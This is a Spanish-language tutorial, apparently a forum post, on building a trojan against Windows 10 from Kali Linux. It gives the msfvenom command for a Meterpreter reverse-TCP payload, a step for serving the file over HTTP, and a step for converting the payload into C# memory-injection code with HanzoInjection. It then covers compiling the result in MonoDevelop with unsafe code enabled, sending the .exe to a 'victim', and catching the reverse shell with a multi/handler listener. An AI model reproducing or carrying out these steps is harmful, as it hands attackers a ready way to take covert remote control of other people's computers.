Ahí te va mi herma hackeando w10 con kali linuxEste método vamos a combinar windows 7 con Kali Linux 2018.2 como ya saben vamos atacar windows 10.
Porque windows 7? porque vamos a compilar un .bin a .cs en el cual vamos a utilizar una pequeña herramienta que se necesita tener net framework
Primero vamos crear el backdoor en código binario con extensión .bin.
Vamos a nuestra terminal de KALI LINUX 2018.2
msfvenom -p windows/meterpreter/reverse_tcp lhost=(IP) lport=(PUERTO)4444 -t raw -o /root/Desktop/example.bin
En este caso lo guarde en Escritorio y vamos a usar SimpleHTTPServer para transportar el archivo.
python -m SimpleHTTPServer 8080
Con la ubicación de la herramienta vamos a transportar el archivo y vamos transformarlo en .cs
vamos a descargar el archivo
aquí
Al Descargar el archivo lo vamos a descomprimir y vamos a usar la herramienta.
En mi caso lo tengo en la carpeta de descarga. Ejemplo
cd /user/CreadPag/Download/hanzoInjection-master
Y ejecutamos el .exe desde la terminal aclaro que tienen que colocar
el archivo creado example.bin en la misma carpeta donde corre el
programa.
HanzoInjection.exe -p example.bin -o injection_memory.cs
Ahora vamos compilar el archivo .cs en Kali Linux pueden seguir en windows usando Visual Studio o seguimos en kali.
Tenemos que descargar un programa llamado MonoDevelop
apt-get install monodevelop
Lo descargamos para poder compilar el archivo .cs y al terminal nos ofrezca el archivo en .exe
Ahora vamos a abrir el programa
Creamos un nuevo proyecto en mi caso vamos a NET- Console Proyect. C#
Borramos el código del proyecto y copiamos el código del archivo .cs
Lo vamos a compilar y nos muestra dos enormes errores pero tranquilo vamos a solucionarlo.
Vamos a Proyect- General- al final dice “Allow ‘unsafe’ code” vamos a seleccionarlo.
Segundo error para la solución.
Vamos a Referencia editar y vamos al final a buscar “System.Xml” y aceptamos.
Ahora el programa va a compilar y nos ha creado una archivo .exe
Ahora simplemente vamos a enviar el archivo a la victima de Windows 10 y vamos a la consola de meterpreter.
Como ya sabes el mismo procedimiento.
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost (IP)
set lport (PUERTO) 4444
exploit
La víctima le va a ejecutar el programa y simplemente no le abrirá pero nosotros vamos a capturar todo.